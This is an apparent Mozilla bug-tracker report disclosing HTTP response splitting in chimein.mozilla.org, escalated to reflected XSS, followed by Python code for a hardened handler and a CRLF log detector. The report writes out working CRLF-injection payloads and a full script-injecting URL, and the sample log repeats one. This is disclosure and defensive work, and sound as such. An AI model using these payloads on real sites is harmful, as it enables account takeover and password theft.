Bug 1311887 - HTTP Response Splitting in chimein.mozilla.org (leverage to Reflected XSS)
Status: RESOLVED FIXED (opened 7 years ago, closed 7 years ago)
Categories: Websites :: Other, defect
Tracking: Not tracked
Reporter: yann.cam; Assignee: Unassigned
Whiteboard: [reporter-external] [web-bounty-form] [verif?]
Attachments: 1 file (256.27 KB, application/x-zip-compressed)
Hello Mozilla Security team,

The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymmetric encryption (public key, private key, password and passphrase) to add strong security for message exchange.

Exchange requests are made through API calls; for example, when a user POSTs a message, it is the "/message/create" entry point which is called. To list messages, "/message/list" is called, and to consult a specific message the following request is made (as an example, the message ID 57 owned by the user ycam with password ycam, used as Proof of Concept):

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

login=ycam&password=ycam&id=57

The resulting data are like (JSON):

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close

{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}

Screenshots:
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png

If a user changes the value of the "id" POST param of the initial request, the following error is retrieved:

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

login=ycam&password=ycam&id=xxx

Error received:

HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0

Screenshot: https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png

There is a reflection of the "id" value in the HTTP headers returned by the server. With the sequence %0a%0d (\r\n), an attacker can forge headers and response content himself:

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d

Response:

HTTP/1.1 500 message xxx
yyy
zzz
 does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0

Screenshot: https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png

So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html) and arbitrary source code. Plus, the payload can be sent directly in a GET param or in a POST param. In GET, the vulnerability is easier to send to victims:

https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d<html><body><script>alert(document.domain)</script></body></html><!--

Or hidden with the url-shortener bit.ly: https://mzl.la/2eypf8b

Screenshot: https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png

Tested successfully with the latest Firefox version 49.0.2.

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits. Through XSS, an attacker can tamper with page rendering, take control of the full browser and use browser exploits to gain privileges on the local system (especially with a dedicated framework for XSS flaws like BeEF: http://beefproject.com/). An attacker will be able to create fake pages, fake prompts, and fake "re-authentication" processes to steal the victim's password. If the attacker gains access to a victim's account, he can use all the features of the secure chat in place of the legitimate user.

HTTP Response Splitting resources:
- https://en.wikipedia.org/wiki/HTTP_response_splitting
- https://www.owasp.org/index.php/HTTP_Response_Splitting

Do not hesitate to contact me for more information,
Sincerely,
Flags: sec-bounty?
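The root cause described in the report is a client-supplied "id" copied verbatim into the reason phrase of the status line, so a CR/LF inside it terminates the real headers and lets the rest of the value become headers and body. The following Python is an added example written for this page, not chimein's code and not the reporter's: it shows a hardened /message/get handler that validates the id as a decimal integer and never echoes it, a response serializer that refuses to emit any header material containing CR or LF, and a small access-log check that flags requests whose query string decodes to a CR or LF. MESSAGES, the function names and the log lines are all constructed for the example; authentication is omitted.

```python
import json
import re
from urllib.parse import parse_qs, unquote

# Constructed stand-in for the message store behind /message/get (not chimein's code).
MESSAGES = {
    57: {"id": 57, "sender": "ycam", "recipient": "ycam", "subject": "ycam", "status": "read"},
}

CRLF_RE = re.compile(r"[\r\n]")
ID_RE = re.compile(r"[0-9]{1,18}")


def build_response(status, reason, headers, body=b""):
    """Serialize exactly one HTTP/1.1 response.

    A CR or LF in the reason phrase or in any header name/value would split the
    response, so that is treated as a server bug and refused outright instead of
    being written to the wire.
    """
    for piece in (reason, *headers.keys(), *headers.values()):
        if CRLF_RE.search(piece):
            raise ValueError("CR/LF in response header material")
    head = [f"HTTP/1.1 {status} {reason}"]
    head += [f"{k}: {v}" for k, v in headers.items()]
    head.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(head) + "\r\n\r\n").encode("ascii") + body


def handle_message_get(form_body):
    """Hardened handler for a form-encoded body such as 'login=..&password=..&id=57'.

    The id is accepted only if it is a short decimal integer; anything else gets a
    fixed 400 whose status line and body contain nothing taken from the request.
    """
    params = parse_qs(form_body, keep_blank_values=True)
    raw_id = params.get("id", [""])[0]
    if not ID_RE.fullmatch(raw_id):
        return build_response(400, "Bad Request", {"Content-Type": "text/plain"},
                              b"invalid message id\n")
    msg = MESSAGES.get(int(raw_id))
    if msg is None:
        # Generic wording: the supplied id is deliberately not reflected.
        return build_response(404, "Not Found", {"Content-Type": "text/plain"},
                              b"message does not exist\n")
    body = json.dumps(msg).encode("utf-8")
    return build_response(200, "OK", {"Content-Type": "application/json"}, body)


def status_line(raw_response):
    """Return the first line of a serialized response, e.g. 'HTTP/1.1 200 OK'."""
    return raw_response.split(b"\r\n", 1)[0].decode("ascii")


def header_block_count(raw_response):
    """A single well-formed response has exactly one header/body separator."""
    return raw_response.count(b"\r\n\r\n")


def flag_splitting_attempts(log_lines):
    """Detection over access-log lines: keep those whose request target, once
    percent-decoded, contains a CR or LF. An integer id never needs either."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and CRLF_RE.search(unquote(m.group(1))):
            hits.append(line)
    return hits


# Constructed access-log lines; only the second one carries an encoded CR/LF.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2016:00:05:14 +0000] "POST /message/get HTTP/1.1" 200 1525',
    '203.0.113.5 - - [21/Oct/2016:00:08:40 +0000] "GET /message/get?login=a&password=b'
    '&id=x%0a%0dContent-Type:%20text/html HTTP/1.1" 500 0',
    '198.51.100.9 - - [21/Oct/2016:00:09:01 +0000] "GET /message/list?login=a&password=b HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    print(status_line(handle_message_get("login=ycam&password=ycam&id=57")))
    print(status_line(handle_message_get("login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d")))
    print(len(flag_splitting_attempts(SAMPLE_LOG)), "suspicious request(s) in sample log")
```

Two design points worth noting: validation happens on the decoded value (parse_qs and unquote already turn %0a%0d into the raw control characters), so the check cannot be bypassed by encoding, and the error responses carry only fixed strings, so even a future bug in build_response would have no attacker-controlled text to reflect.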
Comment 1 (7 years ago):
Resolved by removing site from DNS.
Group: websites-security
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Flags: sec-bounty? → sec-bounty-
Resolution: --- → FIXED